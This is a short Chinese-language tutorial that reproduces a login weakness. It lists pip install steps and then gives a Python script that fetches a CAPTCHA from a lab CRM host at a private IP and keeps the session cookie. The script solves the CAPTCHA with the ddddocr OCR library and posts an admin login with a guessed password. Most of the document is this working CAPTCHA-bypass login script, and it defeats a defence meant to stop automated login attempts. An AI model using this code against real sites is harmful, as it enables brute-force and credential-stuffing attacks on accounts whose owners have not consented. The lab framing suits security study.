Python登录漏洞复现

Python登录漏洞复现

3.1 环境准备

1）升级pip

pip install --upgrade pip -i https://pypi.tuna.tsinghua.edu.cn/simple

2）安装ddddocr图形识别库

pip install ddddocr -i https://pypi.tuna.tsinghua.edu.cn/simple

3）安装requests网络请求库

pip install requests -i https://pypi.tuna.tsinghua.edu.cn/simple

4）安装辅助命令

pip uninstall -y Pillow
pip install Pillow==9.5.0 -i https://pypi.tuna.tsinghua.edu.cn/simple

3.2 python识别验证码

# 注意：验证码的session需要与登录的session一致，不然不匹配
import ddddocr
import requests

# 1）创建ocr连接对象
ocr = ddddocr.DdddOcr()

# 2）获取图片内容
resp = requests.get("http://192.168.190.133/crm/php/verifyCode.php")
image = resp.content

# 3）获取sessionId
cookie = resp.headers['Set-Cookie'].split(";")[0]

# 4）获取验证码
str = ocr.classification(image)

# 5）发送登录请求时，添加请求头，将PHPSESSID放到请求头中
head={'Cookie':cookie}
url = "http://192.168.190.133/crm/php/login.php?username=admin&password=123456&code="+str
data = {"account":"admin","password":"123456","authcode":str}
resps = requests.post(url,headers=head,data=data)
print(resps.text)